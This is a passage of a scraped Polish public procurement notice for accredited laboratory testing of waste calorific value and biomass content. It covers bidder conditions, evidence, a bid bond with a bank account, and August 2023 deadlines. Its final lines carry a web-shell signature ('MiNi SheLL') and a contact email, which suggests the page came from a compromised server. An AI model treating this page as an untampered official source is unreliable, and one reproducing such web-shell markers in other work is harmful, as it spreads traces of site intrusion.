class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może ubiegać się Wykonawca, który:<br/>11.1.1. spełnia warunki dotyczące zdolności do występowania w obrocie gospodarczym, tj.: nie dotyczy;<br/>11.1.2. spełnia warunki dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>tj.: nie dotyczy;<br/>11.1.3. spełnia warunki dotyczące sytuacji ekonomicznej lub finansowej, tj.: nie dotyczy;<br/>11.1.4. spełnia warunki dotyczące zdolności technicznej lub zawodowej, tj.:<br/>11.1.4.1. posiada wiedzę i doświadczenie niezbędne do realizacji zamówienia, tzn.: w okresie ostatnich trzech lat <br/>przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie) wykonał/wykonuje:<br/>11.1.4.1.1. przynajmniej dwie usługi akredytowanego badania próbek odpadów w zakresie dotyczącym <br/>wartości opałowej odpadów, o wartości co najmniej 50 000 zł netto każda; przez usługę rozumie się <br/>realizację jednej umowy z zamawiającym usługę, bez względu na ilość przebadanych w jej ramach <br/>próbek odpadów;<br/>11.1.4.1.2. przynajmniej dwie usługi akredytowanego badania próbek odpadów w zakresie dotyczącym <br/>zawartości frakcji biodegradowalnej o wartości co najmniej 50 000 zł netto każda; przez usługę <br/>rozumie się realizację jednej umowy z zamawiającym usługę, bez względu na ilość przebadanych w <br/>jej ramach próbek odpadów.<br/>UWAGA: W przypadku gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu załączy <br/>podmiotowe środki dowodowe zawierające kwoty wyrażone w walutach innych niż złoty polski, <br/>Zamawiający przeliczy je na złoty polski według średnich kursów walut NBP opublikowanych w dniu, w którym <br/>wydano podmiotowy środek dowodowy. W przypadku braku publikacji kursów walut NBP w dniu, w którym <br/>wydano podmiotowy środek dowodowy, Zamawiający dokona przeliczenia według kursu ostatnio ogłoszonego <br/>przed dniem, w którym wydano podmiotowy środek dowodowy.<br/>11.1.4.2. dysponuje laboratorium posiadającym akredytację laboratorium badawczego wystawioną przez Polskie <br/>Centrum Akredytacji lub certyfikaty innego równoważnego ośrodka akredytacji, potwierdzającą<br/>spełnianie przez to laboratorium normy przenoszącej normę EN ISO/IEC 17025:2018-02, w zakresie obejmującym co najmniej prowadzenie badań odpadów, zgodnie z wymienionymi niżej normami lub ich <br/>aktualniejszymi wydaniami:<br/>• PN-EN 15400:2011 Stałe paliwa wtórne – oznaczanie wartości opałowej;<br/>• PN-EN 15440:2011 Stałe paliwa wtórne – metody oznaczania zawartości biomasy; <br/>w obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części energii odzyskanej z termicznego <br/>przekształcenia odpadów (Dz. U. z 2016 r., poz. 847);<br/>11.1.4.3. dysponuje przynajmniej dwiema osobami przeszkolonymi z pobierania prób paliw stałych w zakresie obowiązujących norm technicznych PN i ISO (lub norm równoważnych), co zostało potwierdzone stosownymi certyfikatami/zaświadczeniami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie <br/>krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień składania:<br/>12.3.1. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie <br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały <br/>wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, <br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz <br/>którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z <br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź <br/>inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed <br/>upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu – w zakresie <br/>potwierdzającym spełnianie warunku, o którym mowa w pkt 11.1.4.1. SWZ;<br/>12.3.2. opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez Wykonawcę w celu <br/>zapewnienia jakości oraz opis zaplecza naukowo-badawczego posiadanego przez Wykonawcę lub które będzie <br/>pozostawało w dyspozycji Wykonawcy - w zakresie potwierdzającym spełnianie warunku, o którym mowa w pkt.<br/>11.1.4.2. SWZ;<br/>12.3.3. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności <br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych <br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – w zakresie potwierdzającym <br/>spełnianie warunku, o którym mowa w pkt 11.1.4.3. SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W postępowaniu o udzielenie zamówienia Zamawiający żąda przedmiotowych środków dowodowych na potwierdzenie, <br/>że oferowane usługi spełniają określone przez Zamawiającego wymagania, cechy lub kryteria w następującym zakresie:<br/>13.1.1. certyfikat wydany przez jednostkę oceniającą zgodność w rozumieniu art. 105 ust. 2 PZP lub sprawozdania z badań <br/>przeprowadzonych przez tę jednostkę na potwierdzenie posiadania przez laboratorium, w którym badane będą <br/>pobrane próbki odpadów akredytacji laboratorium badawczego, potwierdzającej spełnianie wymagań normy <br/>przenoszącej normę EN ISO/IEC 17025:2018-02 wraz z dokumentem dotyczącym zakresu akredytacji wydanym przez <br/>jednostkę oceniającą zgodność, która wydała wskazany certyfikat, w zakresie potwierdzającym zgodności metodyki <br/>badawczej z normami wyspecyfikowanymi w warunkach zamówienia i (jeśli dotyczy) zgodności zakresu pomiarowego <br/>poszczególnych metod z zakresem określonym w warunkach zamówienia;<br/>13.1.2. dokument potwierdzający posiadanie przez Wykonawcę akredytacji na pobór próbek odpadów (co najmniej o kodach: <br/>20 03 01 oraz 19 12 12) zgodnie z normą przenoszącą normę EN 15442:2011 lub jej aktualniejszym wydaniem - w <br/>obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków <br/>technicznych kwalifikowania części energii odzyskanej z termicznego przekształcenia odpadów. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są <br/>niekompletne, Zamawiający wezwie jednokrotnie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w wysokości: 5 000,00 zł (pięć <br/>tysięcy złotych 00/100).<br/>16.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania <br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>16.3. Wadium wnosi się w następujących formach:<br/>16.3.1. pieniądzu,<br/>16.3.2. gwarancjach bankowych,<br/>16.3.3. gwarancjach ubezpieczeniowych,<br/>16.3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku <br/>– o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r., poz. 462 z późn. zm.).<br/>16.4. Uwaga: Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego powinno <br/>zawierać następujące elementy:<br/>16.4.1. określenie terminu obowiązywania poręczenia lub gwarancji przez cały okres związania ofertą;<br/>16.4.2. określenie kwoty poręczenia lub gwarancji;<br/>16.4.3. wskazanie gwaranta poręczenia lub gwarancji;<br/>16.4.4. wskazanie beneficjenta poręczenia lub gwarancji;<br/>16.4.5. zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo, tj. na pierwsze żądanie, do zapłaty pełnej <br/>kwoty zabezpieczenia na rzecz beneficjenta;<br/>16.4.6. nieodwołalność poręczenia lub gwarancji.<br/>16.5. W przypadku wniesienia wadium w formie pieniężnej należy je wpłacić przelewem na konto Zamawiającego:<br/>Nazwa banku: Santander Bank Polska S.A.<br/>Numer rachunku: 73 1090 2053 0000 0001 4761 7962<br/>(IBAN: PL73109020530000000147617962, SWIFT: WBKPPLPP)<br/>powołując się na nazwę postępowania, nr sprawy oraz podając nazwę banku i numer swojego rachunku, na który<br/>należy zwrócić wadium.<br/>16.6. Za skutecznie wniesione wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem <br/>terminu składania ofert lub wniosków) zostanie zaksięgowane na rachunku bankowym Zamawiającego (decyduje data <br/>uznania rachunku Zamawiającego).<br/>16.7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał <br/>gwarancji lub poręczenia w postaci elektronicznej.<br/>16.8. Zamawiający dopuszcza złożenie wadium w kilku formach przy jednoczesnym spełnieniu powyższych obowiązków.<br/>16.9. Zasady zwrotu i zatrzymania wadium określa PZP.<br/>16.10. Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 PZP, powoduje rozwiązanie stosunku <br/>prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa <br/>w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>11.2.1. Szczególny sposób spełniania przez takich Wykonawców warunków udziału w postępowaniu: Zamawiający nie <br/>precyzuje.<br/>11.2.2. Wykonawcy tacy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo <br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja <br/>prowadzona będzie wyłącznie z pełnomocnikiem.<br/>11.2.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa <br/>w pkt. 11.1.2 SWZ, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje <br/>roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>11.2.4. Do Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy.<br/>11.2.5. W przypadku wspólnego ubiegania się o udzielenie zamówienia, żaden z Wykonawców nie może podlegać wykluczeniu z postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem odrębnych postanowień <br/>niniejszej Umowy.<br/>2. Zamawiający, poza sytuacjami przewidzianymi w art. 455 ustawy PZP, dopuszcza zmiany postanowień Umowy w stosunku do <br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następującym zakresie:<br/>1) w zakresie terminu realizacji przedmiotu Umowy z powodu siły wyższej lub działań osób trzecich uniemożliwiających <br/>realizację przedmiotu Umowy, które to działania nie są konsekwencją winy którejkolwiek ze Stron – o czasu równy <br/>okresowi, w którym nie była możliwa realizacja Umowy; <br/>2) w przypadku uchwalenia lub zmiany obowiązujących przepisów, których uchwalenie lub zmiana nastąpiły po dniu <br/>zawarcia Umowy, a z których treści wynika konieczność lub zasadność wprowadzenia zmian do Umowy w zakresie <br/>koniecznym do uzyskania zgodności realizacji przedmiotu Umowy z obowiązującym stanem prawnym.<br/><br/>Pozostałe zapisy dotyczące zmiany umowy zawiera załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-14 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dodatkowo, z postępowania wyklucza się Wykonawcę, wobec którego zachodzą przesłanki wykluczenia na podstawie art. <br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na <br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 129 z późn. zm.), zwanej dalej „ustawą <br/>z 13 kwietnia”. Zgodnie z w/w podstawą prawną, z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>10.6.1. Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i <br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej <br/>o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z 13 kwietnia;<br/>10.6.2. Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca <br/>2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r., poz. 1124 z późn. <br/>zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 <br/>albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została <br/>wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym <br/>mowa w art. 1 pkt 3 ustawy z 13 kwietnia;<br/>10.6.3. Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z <br/>dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r., poz. 120 z późn. zm.), jest podmiot wymieniony w <br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący <br/>taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie <br/>wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z 13 kwietnia.

Creat By MiNi SheLL
Email: jattceo@gmail.com